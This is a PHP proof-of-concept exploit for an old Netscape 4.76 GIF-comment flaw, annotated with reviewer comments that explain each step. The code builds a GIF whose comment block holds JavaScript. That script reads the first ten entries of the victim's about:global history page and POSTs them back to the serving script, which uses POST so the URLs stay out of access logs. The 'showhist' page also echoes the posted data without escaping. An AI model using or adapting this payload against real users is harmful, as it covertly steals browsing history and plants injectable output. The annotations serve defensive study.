
  1. <?
  2. /*
  3. Netscape 4.76 gif comment flaw
  4.  
  5. Florian Wesch <fw@dividuum.de>
  6. http://dividuum.de
  7. */
// Review notes (defender's reading of this proof of concept):
// - Flow: intro -> frameset (frame "foo" = loadhistory, frame "bar" = showimageinfo)
//   -> the GIF served by mode=evilgif carries HTML/script text in its comment
//   block -> that script copies the first ten links of frame "foo" (about:global,
//   the browser's history listing) into a form and POSTs them as $u -> mode=showhist
//   prints them. Impact is disclosure of the victim's browsing history to the
//   site serving this script.
// - Runtime assumptions: register_globals (so $SERVER_NAME, $SERVER_PORT,
//   $PHP_SELF, $mode and $u arrive as plain variables) and short_open_tag (<?).
//   register_globals has been off by default since PHP 4.2 and was removed in
//   PHP 5.4, so this does not run unmodified on a current PHP.
// - Hygiene: $self (built from server variables, which may be Host-header derived
//   depending on the web server's configuration) and $u are echoed into HTML
//   without htmlspecialchars(); see the notes at the echo sites below.
  8.  
// $self is the absolute URL of this script. The 64-character cap that follows
// keeps "<form action=".$self (13 + 64 chars) within the 77-character field
// that sprintf("%77s") pads to in the evilgif case, so the comment-block
// layout of the generated GIF stays fixed regardless of the hostname.
  9. $self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
  10. if (strlen($self)>64) {
  11.     echo "Url of $self is too long. 64 maximum.<br>";
  12.     echo "You can change this but I think 64 should be enough for anybody ;-)";
  13.     exit;
  14. }
  15.  
// $mode comes from the query string (?mode=...) via register_globals.
  16. if (!isset($mode)) $mode="intro";
  17.  
  18. // If urllist is submitted
// $u is the "|"-joined URL list posted by the form embedded in the GIF comment
// (see '<input name=u>' in the evilgif case); its presence overrides $mode.
  19. if (isset($u)) $mode="showhist";
  20.  
  21. switch ($mode) {
  22.     case "intro":
         // Landing page: a single link into the frameset.
  23.         ?>
  24.         <html>
  25.             <body>
  26.                 <a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
  27.             </body>
  28.         </html>
  29.         <?
  30.         break;
  31.     case "frameset":
         // Top frame "foo" will end up holding about:global; bottom frame "bar"
         // drives the image load. The script in the GIF reads "foo" via parent.frames.
  32.         ?>
  33.         <html>
  34.             <frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
  35.                 <frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
  36.                 <frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
  37.             </frameset>
  38.         </html>
  39.         <?
  40.         break;
  41.     case "loadhistory":
  42.         // replaces the current document with about:global using javascript
         // <base href="about:"> plus action="global" is what makes the auto-submitted
         // form land on about:global (presumably via relative URL resolution — confirm
         // against the browser's behaviour; this file only shows the markup).
  43.         ?>
  44.         <html>
  45.             <base href="about:">
  46.             <form action="global" name="loadhistory">
  47.                 <input type="submit">
  48.             </form>
  49.             <script language="javascript">
  50.                 document.loadhistory.submit();
  51.             </script>
  52.         </html>
  53.         <?
  54.         break;
  55.     case "showimageinfo":
         // The GIF is first fetched as an <img>; after 5 s the frame navigates to
         // about:<self>?mode=evilgif. NOTE(review): the case name suggests Netscape
         // renders the cached image's info (including its comment text) as a
         // document there, which would be where the embedded script executes —
         // inferred from the flow, not stated anywhere in this file.
  56.         ?>
  57.         <html>
  58.             <head>
  59.                 <meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
  60.             </head>
  61.             <body>
  62.                 Waiting 5 seconds...<br>
  63.                 <img src="<? echo $self; ?>?mode=evilgif">
  64.             </body>
  65.         </html>
  66.         <?
  67.         break;
  68.     case "evilgif":
  69.         // Gifs are supposed to be compressed. The program I
  70.         // used sucks :-)
         // Hand-assembled GIF89a, kept as hex text and packed to bytes at the end:
         // "GIF89a" header, 10x10 logical screen, a 256-entry global colour table
         // (the long ff/00 runs), then 21 fe ff = extension introducer 0x21,
         // comment label 0xFE, and a 0xFF (255-byte) data sub-block whose payload
         // is the HTML/script built by sprintf() below. A GIF consumer is supposed
         // to treat comment text as inert data; rendering it is the flaw shown here.
  71.         header("Content-type: image/gif");
  72.         $gif ="4749463839610a000a00f70000ffffffffffccffff";
  73.         $gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
  74.         $gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
  75.         $gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
  76.         $gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
  77.         $gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
  78.         $gif.="fffffffffffffffffffffffffffffffffffffffffff";
  79.         $gif.="fffffffffffffffffffffffffffffffffffffffffff";
  80.         $gif.="fffffffffffffffffffffffffffffffffffffffffff";
  81.         $gif.="ffffffffffffffffffffffff0000000000000000000";
  82.         $gif.="0000000000000000000000000000000000000000000";
  83.         $gif.="0000000000000000000000000000000000000000000";
  84.         $gif.="0000000000000000000000000000000000000000000";
  85.         $gif.="0000000000000000000000000000000000000000000";
  86.         $gif.="0000000000000000000000000000000000000000000";
  87.         $gif.="0000000000000000000000000000000000000000000";
  88.         $gif.="0000000000000000000000000000000000000000000";
  89.         $gif.="0000000000000000000000000000000000000000000";
  90.         $gif.="0000000000000000000000000000000000000000000";
  91.         $gif.="0000000000000000000000000000000000000000000";
  92.         $gif.="0000000000000000000000000000000000000000000";
  93.         $gif.="0000000000000000000000000000000000000000000";
  94.         $gif.="0000000000000000000000000000000000000000000";
  95.         $gif.="0000000000000000000000000000000000000000000";
  96.         $gif.="0000000000000000000000000000000000000000000";
  97.         $gif.="0000000000000000000000000000000000000000000";
  98.         $gif.="0000000000000000000000000000000000000000000";
  99.         $gif.="0000000000000000000000000000000000000000000";
  100.         $gif.="0000000000000000000000000000000000000000000";
  101.         $gif.="0000000000000000000000000000000000000000000";
  102.         $gif.="0000000000000000000000000000000000000000000";
  103.         $gif.="0000000000000000000000000000000000000000000";
  104.         $gif.="0000000000000000000000000000000000000000000";
  105.         $gif.="0000000000000000000000000000000000000000000";
  106.         $gif.="0000000000000000000000000000000000000000000";
  107.         $gif.="0000000000000000000000000000000000000000000";
  108.         $gif.="00000000000000021feff";
         // %77s pads "<form action=".$self to exactly 77 characters (13 plus the
         // 64-character cap enforced on $self above), so every later byte of the
         // comment sits at a fixed offset. The result is hex-encoded to match the
         // rest of $gif. The 'f=parent.frames["foo"]' / 'f.links[i]' lines are the
         // history read: ten entries of about:global, joined with "|" into field u.
  109.         $gif.=bin2hex(sprintf("%77s%s",
  110.  
  111.       /*"<form action=".$self,' target=_parent name=s method=get >'.*/
  112.       /* I'm using POST so the submitted urls do not appear in the logfile */
         /* NOTE(review): that also means the leaked list only shows up in POST-body
            logging, not in a plain access log — relevant when hunting for this. */
  113.         "<form action=".$self,' target=_parent name=s method=post>'.
  114.             '<input name=u>'.
  115.         '</form>'.
  116.         '<script>'.
  117.             'f=parent.frames["foo"].document;'.
  118.             'l="";'.
  119.           /*'for(i=0;i<f.links.length;i++)'.*/
  120.             'for(i=0;i<10            ;i++)'.
  121.                 'l+=f.links[i]+"|";'.
  122.             'document.s.u.value=l;'.
            /* chr(255) is written into the middle of the JS text; presumably this is
               where the 255-byte sub-block ends and the next sub-block's 0xFF length
               byte must appear — confirm by counting the bytes since 21 fe ff. */
  123.             'document.'.chr(255).'s.submit();'.
  124.         '</script>'));
  125.  
  126.         $gif.=              "00000000000000000000000000000";
  127.         $gif.="0000000000000000000000000000000000000000000";
  128.         $gif.="0000000000000000000000000000000000000000000";
  129.         $gif.="0000000000000000000000000000000000000000000";
  130.         $gif.="0000000000000000000000000000000000000000000";
  131.         $gif.="0000000000000000000000000000000000000000000";
  132.         $gif.="0000000000000000000000000000000000000000000";
  133.         $gif.="0000000000000000000000000000000000000000000";
  134.         $gif.="0000000000000000000000000000000000000000000";
  135.         $gif.="0000000000000000000000000000000000000000000";
  136.         $gif.="0000000000000000000000000000000000000000000";
         // 2c ... is the image descriptor (10x10 image, LZW min code size 8), 3b is
         // the GIF trailer.
  137.         $gif.="00000000000002c000000000a000a00000813004708";
  138.         $gif.="1c48b0a0c18308132a5cc8b061c28000003b";
         // pack's "H" code with a count equal to the string length decodes the whole
         // hex text into raw bytes (what hex2bin() does on PHP >= 5.4).
  139.         echo pack("H".strlen($gif), $gif);
  140.         break;
  141.     case "showhist":
         // $u is the POSTed "|"-joined list. NOTE(review): each entry is echoed raw
         // into an unquoted href and into the page text — reflected XSS against
         // whoever views this page; htmlspecialchars($url, ENT_QUOTES) would be
         // needed on both uses, and the href should be quoted.
  142.         $urls=explode("|",$u);
  143.         echo "<h1>Top 10 urls in about:global</h1>";
  144.         foreach ($urls as $url) {
  145.             echo "<a href=$url>$url</a><br>";
  146.         }
  147.     };
// (the ";" after the switch's closing brace is an empty statement, harmless)
  148. ?>